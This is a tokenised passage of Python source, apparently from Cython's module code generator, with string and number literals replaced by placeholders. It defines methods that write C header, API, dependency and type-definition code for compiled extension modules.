[ ] <EOL> self . find_referenced_modules ( env , self . referenced_modules , { } ) <EOL> if self . has_imported_c_functions ( ) : <EOL> self . module_temp_cname = env . allocate_temp_pyobject ( ) <EOL> env . release_temp ( self . module_temp_cname ) <EOL> if options . recursive : <EOL> self . generate_dep_file ( env , result ) <EOL> self . generate_c_code ( env , options , result ) <EOL> self . generate_h_code ( env , options , result ) <EOL> self . generate_api_code ( env , result ) <EOL> def has_imported_c_functions ( self ) : <EOL> for module in self . referenced_modules : <EOL> for entry in module . cfunc_entries : <EOL> if entry . defined_in_pxd : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def generate_dep_file ( self , env , result ) : <EOL> modules = self . referenced_modules <EOL> if len ( modules ) > <NUM_LIT:1> or env . included_files : <EOL> dep_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> f = open ( dep_file , "<STR_LIT:w>" ) <EOL> try : <EOL> for module in modules : <EOL> if module is not env : <EOL> f . write ( "<STR_LIT>" % module . qualified_name ) <EOL> for path in module . included_files : <EOL> f . write ( "<STR_LIT>" % path ) <EOL> finally : <EOL> f . close ( ) <EOL> def generate_h_code ( self , env , options , result ) : <EOL> def h_entries ( entries , pxd = <NUM_LIT:0> ) : <EOL> return [ entry for entry in entries <EOL> if entry . visibility == '<STR_LIT>' or pxd and entry . defined_in_pxd ] <EOL> h_types = h_entries ( env . type_entries ) <EOL> h_vars = h_entries ( env . var_entries ) <EOL> h_funcs = h_entries ( env . cfunc_entries ) <EOL> h_extension_types = h_entries ( env . c_class_entries ) <EOL> if h_types or h_vars or h_funcs or h_extension_types : <EOL> result . h_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> h_code = Code . CCodeWriter ( ) <EOL> if options . generate_pxi : <EOL> result . i_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> i_code = Code . PyrexCodeWriter ( result . i_file ) <EOL> else : <EOL> i_code = None <EOL> guard = Naming . h_guard_prefix + env . qualified_name . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> h_code . put_h_guard ( guard ) <EOL> self . generate_extern_c_macro_definition ( h_code ) <EOL> self . generate_type_header_code ( h_types , h_code ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % Naming . api_guard_prefix + self . api_name ( env ) ) <EOL> if h_vars : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_vars : <EOL> self . generate_public_declaration ( entry , h_code , i_code ) <EOL> if h_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_funcs : <EOL> self . generate_public_declaration ( entry , h_code , i_code ) <EOL> if h_extension_types : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_extension_types : <EOL> self . generate_cclass_header_code ( entry . type , h_code ) <EOL> if i_code : <EOL> self . generate_cclass_include_code ( entry . type , i_code ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % env . module_name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . copyto ( open_new_file ( result . h_file ) ) <EOL> def generate_public_declaration ( self , entry , h_code , i_code ) : <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> entry . type . declaration_code ( <EOL> entry . cname , dll_linkage = "<STR_LIT>" ) ) ) <EOL> if i_code : <EOL> i_code . putln ( "<STR_LIT>" % <EOL> entry . type . declaration_code ( entry . cname , pyrex = <NUM_LIT:1> ) ) <EOL> def api_name ( self , env ) : <EOL> return env . qualified_name . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> def generate_api_code ( self , env , result ) : <EOL> api_funcs = [ ] <EOL> public_extension_types = [ ] <EOL> has_api_extension_types = <NUM_LIT:0> <EOL> for entry in env . cfunc_entries : <EOL> if entry . api : <EOL> api_funcs . append ( entry ) <EOL> for entry in env . c_class_entries : <EOL> if entry . visibility == '<STR_LIT>' : <EOL> public_extension_types . append ( entry ) <EOL> if entry . api : <EOL> has_api_extension_types = <NUM_LIT:1> <EOL> if api_funcs or has_api_extension_types : <EOL> result . api_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> h_code = Code . CCodeWriter ( ) <EOL> name = self . api_name ( env ) <EOL> guard = Naming . api_guard_prefix + name <EOL> h_code . put_h_guard ( guard ) <EOL> h_code . putln ( '<STR_LIT>' ) <EOL> if result . h_file : <EOL> h_code . putln ( '<STR_LIT>' % os . path . basename ( result . h_file ) ) <EOL> for entry in public_extension_types : <EOL> type = entry . type <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % type . typeptr_cname ) <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> type . typeobj_cname , type . typeptr_cname ) ) <EOL> if api_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in api_funcs : <EOL> type = CPtrType ( entry . type ) <EOL> h_code . putln ( "<STR_LIT>" % type . declaration_code ( entry . cname ) ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put_h_guard ( Naming . api_func_guard + "<STR_LIT>" ) <EOL> h_code . put ( import_module_utility_code . impl ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> if api_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put ( function_import_utility_code . impl ) <EOL> if public_extension_types : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put ( type_import_utility_code . impl ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( '<STR_LIT>' % env . qualified_name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in api_funcs : <EOL> sig = entry . type . signature_string ( ) <EOL> h_code . putln ( <EOL> '<STR_LIT>' % ( <EOL> entry . name , <EOL> entry . cname , <EOL> sig ) ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in public_extension_types : <EOL> self . generate_type_import_call ( <EOL> entry . type , h_code , <EOL> "<STR_LIT>" % entry . type . typeptr_cname ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT:}>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . copyto ( open_new_file ( result . api_file ) ) <EOL> def generate_cclass_header_code ( self , type , h_code ) : <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> type . typeobj_cname ) ) <EOL> def generate_cclass_include_code ( self , type , i_code ) : <EOL> i_code . putln ( "<STR_LIT>" % ( <EOL> type . module_name , type . name ) ) <EOL> i_code . indent ( ) <EOL> var_entries = type . scope . var_entries <EOL> if var_entries : <EOL> for entry in var_entries : <EOL> i_code . putln ( "<STR_LIT>" % <EOL> entry . type . declaration_code ( entry . cname , pyrex = <NUM_LIT:1> ) ) <EOL> else : <EOL> i_code . putln ( "<STR_LIT>" ) <EOL> i_code . dedent ( ) <EOL> def generate_c_code ( self , env , options , result ) : <EOL> modules = self . referenced_modules <EOL> if Options . annotate or options . annotate : <EOL> code = Annotate . AnnotationCCodeWriter ( ) <EOL> else : <EOL> code = Code . CCodeWriter ( emit_linenums = options . emit_linenums ) <EOL> h_code = code . insertion_point ( ) <EOL> self . generate_module_preamble ( env , modules , h_code ) <EOL> code . globalstate . module_pos = self . pos <EOL> code . globalstate . directives = self . directives <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % env . qualified_name ) <EOL> self . generate_const_definitions ( env , code ) <EOL> self . generate_interned_num_decls ( env , code ) <EOL> self . generate_interned_string_decls ( env , code ) <EOL> self . generate_py_string_decls ( env , code ) <EOL> code . globalstate . insert_global_var_declarations_into ( code ) <EOL> self . generate_cached_builtins_decls ( env , code ) <EOL> self . body . generate_function_definitions ( env , code ) <EOL> code . mark_pos ( None ) <EOL> self . generate_typeobj_definitions ( env , code ) <EOL> self . generate_method_table ( env , code ) <EOL> self . generate_filename_init_prototype ( code ) <EOL> if env . has_import_star : <EOL> self . generate_import_star ( env , code ) <EOL> self . generate_pymoduledef_struct ( env , code ) <EOL> self . generate_module_init_func ( modules [ : - <NUM_LIT:1> ] , env , code ) <EOL> code . mark_pos ( None ) <EOL> self . generate_module_cleanup_func ( env , code ) <EOL> self . generate_filename_table ( code ) <EOL> self . generate_utility_functions ( env , code , h_code ) <EOL> self . generate_declarations_for_modules ( env , modules , h_code ) <EOL> h_code . write ( '<STR_LIT:\n>' ) <EOL> code . globalstate . close_global_decls ( ) <EOL> f = open_new_file ( result . c_file ) <EOL> code . copyto ( f ) <EOL> f . close ( ) <EOL> result . c_file_generated = <NUM_LIT:1> <EOL> if Options . annotate or options . annotate : <EOL> self . annotate ( code ) <EOL> code . save_annotation ( result . main_source_file , result . c_file ) <EOL> def find_referenced_modules ( self , env , module_list , modules_seen ) : <EOL> if env not in modules_seen : <EOL> modules_seen [ env ] = <NUM_LIT:1> <EOL> for imported_module in env . cimported_modules : <EOL> self . find_referenced_modules ( imported_module , module_list , modules_seen ) <EOL> module_list . append ( env ) <EOL> def sort_types_by_inheritance ( self , type_dict , getkey ) : <EOL> type_items = type_dict . items ( ) <EOL> type_list = [ ] <EOL> for i , item in enumerate ( type_items ) : <EOL> key , new_entry = item <EOL> hierarchy = set ( ) <EOL> base = new_entry <EOL> while base : <EOL> base_type = base . type . base_type <EOL> if not base_type : <EOL> break <EOL> base_key = getkey ( base_type ) <EOL> hierarchy . add ( base_key ) <EOL> base = type_dict . get ( base_key ) <EOL> new_entry . base_keys = hierarchy <EOL> for j in range ( i ) : <EOL> entry = type_list [ j ] <EOL> if key in entry . base_keys : <EOL> type_list . insert ( j , new_entry ) <EOL> break <EOL> else : <EOL> type_list . append ( new_entry ) <EOL> return type_list <EOL> def sort_type_hierarchy ( self , module_list , env ) : <EOL> vtab_dict = { } <EOL> vtabslot_dict = { } <EOL> for module in module_list : <EOL> for entry in module . c_class_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . vtabstruct_cname : <EOL> vtab_dict [ type . vtabstruct_cname ] = entry <EOL> all_defined_here = module is env <EOL> for entry in module . type_entries : <EOL> if all_defined_here or entry . defined_in_pxd : <EOL> type = entry . type <EOL> if type . is_extension_type and not entry . in_cinclude : <EOL> type = entry . type <EOL> vtabslot_dict [ type . objstruct_cname ] = entry <EOL> def vtabstruct_cname ( entry_type ) : <EOL> return entry_type . vtabstruct_cname <EOL> vtab_list = self . sort_types_by_inheritance ( <EOL> vtab_dict , vtabstruct_cname ) <EOL> def objstruct_cname ( entry_type ) : <EOL> return entry_type . objstruct_cname <EOL> vtabslot_list = self . sort_types_by_inheritance ( <EOL> vtabslot_dict , objstruct_cname ) <EOL> return ( vtab_list , vtabslot_list ) <EOL> def generate_type_definitions ( self , env , modules , vtab_list , vtabslot_list , code ) : <EOL> vtabslot_entries = set ( vtabslot_list ) <EOL> for module in modules : <EOL> definition = module is env <EOL> if definition : <EOL> type_entries = module . type_entries <EOL> else : <EOL> type_entries = [ ] <EOL> for entry in module . type_entries : <EOL> if entry . defined_in_pxd : <EOL> type_entries . append ( entry ) <EOL> for entry in type_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . is_typedef : <EOL> self . generate_typedef ( entry , code ) <EOL> elif type . is_struct_or_union : <EOL> self . generate_struct_union_definition ( entry , code ) <EOL> elif type . is_enum : <EOL> self . generate_enum_definition ( entry , code ) <EOL> elif type . is_extension_type and entry not in vtabslot_entries : <EOL> self . generate_obj_struct_definition ( type , code ) <EOL> for entry in vtabslot_list : <EOL> self . generate_obj_struct_definition ( entry . type , code ) <EOL> for entry in vtab_list : <EOL> self . generate_typeobject_predeclaration ( entry , code ) <EOL> self . generate_exttype_vtable_struct ( entry , code ) <EOL> self . generate_exttype_vtabptr_declaration ( entry , code ) <EOL> def generate_declarations_for_modules ( self , env , modules , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> vtab_list , vtabslot_list = self . sort_type_hierarchy ( modules , env ) <EOL> self . generate_type_definitions ( <EOL> env , modules , vtab_list , vtabslot_list , code ) <EOL> for module in modules : <EOL> defined_here = module is env <EOL> code . putln ( "<STR_LIT>" % <EOL> module . qualified_name . encode ( "<STR_LIT>" , "<STR_LIT:ignore>" ) ) <EOL> self . generate_global_declarations ( module , code , defined_here ) <EOL> self . generate_cfunction_predeclarations ( module , code , defined_here ) <EOL> def generate_module_preamble ( self , env , cimported_modules , code ) : <EOL> code . putln ( '<STR_LIT>' % ( <EOL> Version . version , time . asctime ( ) ) ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> for filename in env . python_include_files : <EOL> code . putln ( '<STR_LIT>' % filename ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . put ( builtin_module_name_utility_code . proto ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if Future . division in env . context . future_directives : <EOL> code . putln ( "<STR_LIT>" ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_extern_c_macro_definition ( code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . api_guard_prefix + self . api_name ( env ) ) <EOL> self . generate_includes ( env , cimported_modules , code ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . put ( Nodes . utility_function_predeclarations ) <EOL> code . put ( PyrexTypes . type_conversion_predeclarations ) <EOL> code . put ( Nodes . branch_prediction_macros ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % env . module_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . builtins_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . empty_tuple ) <EOL> if Options . pre_import is not None : <EOL> code . putln ( '<STR_LIT>' % Naming . preimport_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . lineno_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . clineno_cname ) <EOL> code . putln ( '<STR_LIT>' % ( Naming . cfilenm_cname , Naming . file_c_macro ) ) <EOL> code . putln ( '<STR_LIT>' % Naming . filename_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . filetable_cname ) <EOL> if env . doc : <EOL> docstr = env . doc <EOL> if not isinstance ( docstr , str ) : <EOL> docstr = docstr . utf8encode ( ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % ( <EOL> env . doc_cname , escape_byte_string ( docstr ) ) ) <EOL> def generate_extern_c_macro_definition ( self , code ) : <EOL> name = Naming . extern_c_macro <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' % name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_includes ( self , env , cimported_modules , code ) : <EOL> includes = env . include_files [ : ] <EOL> for module in cimported_modules : <EOL> for filename in module . include_files : <EOL> if filename not in includes : <EOL> includes . append ( filename ) <EOL> for filename in includes : <EOL> code . putln ( '<STR_LIT>' % filename ) <EOL> def generate_filename_table ( self , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . filenames_cname ) <EOL> if code . globalstate . filename_list : <EOL> for source_desc in code . globalstate . filename_list : <EOL> filename = os . path . basename ( source_desc . get_filenametable_entry ( ) ) <EOL> escaped_filename = filename . replace ( "<STR_LIT:\\>" , "<STR_LIT>" ) . replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % <EOL> escaped_filename ) <EOL> else : <EOL> code . putln ( "<STR_LIT:0>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_type_predeclarations ( self , env , code ) : <EOL> pass <EOL> def generate_type_header_code ( self , type_entries , code ) : <EOL> for entry in type_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . is_typedef : <EOL> self . generate_typedef ( entry , code ) <EOL> elif type . is_struct_or_union : <EOL> self . generate_struct_union_definition ( entry , code ) <EOL> elif type . is_enum : <EOL> self . generate_enum_definition ( entry , code ) <EOL> elif type . is_extension_type : <EOL> self . generate_obj_struct_definition ( type , code ) <EOL> def generate_gcc33_hack ( self , env , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . c_class_entries : <EOL> type = entry . type <EOL> if not type . typedef_flag : <EOL> name = type . objstruct_cname <EOL> if name . startswith ( "<STR_LIT>" ) : <EOL> tail = name [ <NUM_LIT:6> : ] <EOL> else : <EOL> tail = name <EOL> code . putln ( "<STR_LIT>" % ( <EOL> name , tail ) ) <EOL> def generate_typedef ( self , entry , code ) : <EOL> base_type = entry . type . typedef_base_type <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % base_type . declaration_code ( entry . cname ) ) <EOL> def sue_header_footer ( self , type , kind , name ) : <EOL> if type . typedef_flag : <EOL> header = "<STR_LIT>" % kind <EOL> footer = "<STR_LIT>" % name <EOL> else : <EOL> header = "<STR_LIT>" % ( kind , name ) <EOL> footer = "<STR_LIT>" <EOL> return header , footer <EOL> def generate_struct_union_definition ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> scope = type . scope <EOL> if scope : <EOL> header , footer = self . sue_header_footer ( type , type . kind , type . cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> var_entries = scope . var_entries <EOL> if not var_entries : <EOL> error ( entry . pos , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for attr in var_entries : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> attr . type . declaration_code ( attr . cname ) ) <EOL> code . putln ( footer ) <EOL> def generate_enum_definition ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> name = entry . cname or entry . name or "<STR_LIT>" <EOL> header , footer = self . sue_header_footer ( type , "<STR_LIT>" , name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> enum_values = entry . enum_values <EOL> if not enum_values : <EOL> error ( entry . pos , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> last_entry = enum_values [ - <NUM_LIT:1> ] <EOL> for value_entry in enum_values : <EOL> if value_entry . value == value_entry . name : <EOL> value_code = value_entry . cname <EOL> else : <EOL> value_code = ( "<STR_LIT>" % ( <EOL> value_entry . cname , <EOL> value_entry . value ) ) <EOL> if value_entry is not last_entry : <EOL> value_code += "<STR_LIT:U+002C>" <EOL> code . putln ( value_code ) <EOL> code . putln ( footer ) <EOL> def generate_typeobject_predeclaration ( self , entry , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> name = entry . type . typeobj_cname <EOL> if name : <EOL> if entry . visibility == '<STR_LIT>' and not entry . in_cinclude : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> name ) ) <EOL> elif entry . visibility == '<STR_LIT>' : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> name ) ) <EOL> def generate_exttype_vtable_struct ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> scope = type . scope <EOL> if type . vtabstruct_cname : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> type . vtabstruct_cname ) <EOL> if type . base_type and type . base_type . vtabstruct_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . base_type . vtabstruct_cname , <EOL> Naming . obj_base_cname ) ) <EOL> for method_entry in scope . cfunc_entries : <EOL> if not method_entry . is_inherited : <EOL> code . putln ( <EOL> "<STR_LIT>" % method_entry . type . declaration_code ( "<STR_LIT>" % method_entry . name ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_exttype_vtabptr_declaration ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> if type . vtabptr_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . vtabptr_cname ) ) <EOL> def generate_obj_struct_definition ( self , type , code ) : <EOL> code . mark_pos ( type . pos ) <EOL> if not type . scope : <EOL> return <EOL> header , footer = self . sue_header_footer ( type , "<STR_LIT>" , type . objstruct_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> base_type = type . base_type <EOL> if base_type : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) [ base_type . typedef_flag ] , <EOL> base_type . objstruct_cname , <EOL> Naming . obj_base_cname ) ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if type . vtabslot_cname and not ( type . base_type and type . base_type . vtabslot_cname ) : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . vtabslot_cname ) ) <EOL> for attr in type . scope . var_entries : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> attr . type . declaration_code ( attr . cname ) ) <EOL> code . putln ( footer ) <EOL> def generate_global_declarations ( self , env , code , definition ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . c_class_entries : <EOL> if definition or entry . defined_in_pxd : <EOL> code . putln ( "<STR_LIT>" % <EOL> entry . type . typeptr_cname ) <EOL> code . put_var_declarations ( env . var_entries , static = <NUM_LIT:1> , <EOL> dll_linkage = "<STR_LIT>" , definition = definition ) <EOL> if definition : <EOL> code . put_var_declarations ( env . default_entries , static = <NUM_LIT:1> , <EOL> definition = definition ) <EOL> def generate_cfunction_predeclarations ( self , env , code , definition ) : <EOL> for entry in env . cfunc_entries : <EOL> if not entry . in_cinclude and ( definition <EOL> or entry . defined_in_pxd or entry . visibility == '<STR_LIT>' ) : <EOL> if entry . visibility in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> dll_linkage = "<STR_LIT>" <EOL> else : <EOL> dll_linkage = None <EOL> type = entry . type <EOL> if not definition and entry . defined_in_pxd : <EOL> type = CPtrType ( type ) <EOL> header = type . declaration_code ( entry . cname , <EOL> dll_linkage = dll_linkage ) <EOL> if entry . visibility == '<STR_LIT>' : <EOL> storage_class = "<STR_LIT>" <EOL> elif entry . visibility == '<STR_LIT>' : <EOL> storage_class = "<STR_LIT>" <EOL> else : <EOL> storage_class = "<STR_LIT>" % Naming . extern_c_macro <EOL> code . putln ( "<STR_LIT>" % ( <EOL> storage_class , <EOL> header ) ) <EOL> def generate_typeobj_definitions ( self , env , code ) : <EOL> full_module_name = env . qualified_name <EOL> for entry in env . c_class_entries : <EOL> if entry . visibility != '<STR_LIT>' : <EOL> type = entry . type <EOL> scope = type . scope <EOL> if scope : <EOL> self . generate_exttype_vtable ( scope , code ) <EOL> self . generate_new_function ( scope , code ) <EOL> self . generate_dealloc_function ( scope , code ) <EOL> if scope . needs_gc ( ) : <EOL> self . generate_traverse_function ( scope , code ) <EOL> self . generate_clear_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" ] ) : <EOL> self . generate_getitem_int_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_ass_subscript_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> warning ( self . pos , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . generate_ass_slice_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_getattro_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_setattro_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" ] ) : <EOL> self . generate_descr_get_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_descr_set_function ( scope , code ) <EOL> self . generate_property_accessors ( scope , code ) <EOL> self . generate_method_table ( scope , code ) <EOL> self . generate_member_table ( scope , code ) <EOL> self . generate_getset_table ( scope , code ) <EOL> self . generate_typeobj_definition ( full_module_name , entry , code ) <EOL> def generate_exttype_vtable ( self , scope , code ) : <EOL> type = scope . parent_type <EOL> if type . vtable_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . vtable_cname ) ) <EOL> def generate_self_cast ( self , scope , code ) : <EOL> type = scope . parent_type <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . declaration_code ( "<STR_LIT:p>" ) , <EOL> type . declaration_code ( "<STR_LIT>" ) ) ) <EOL> def generate_new_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . ConstructorSlot ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> type = scope . parent_type <EOL> base_type = type . base_type <EOL> py_attrs = [ 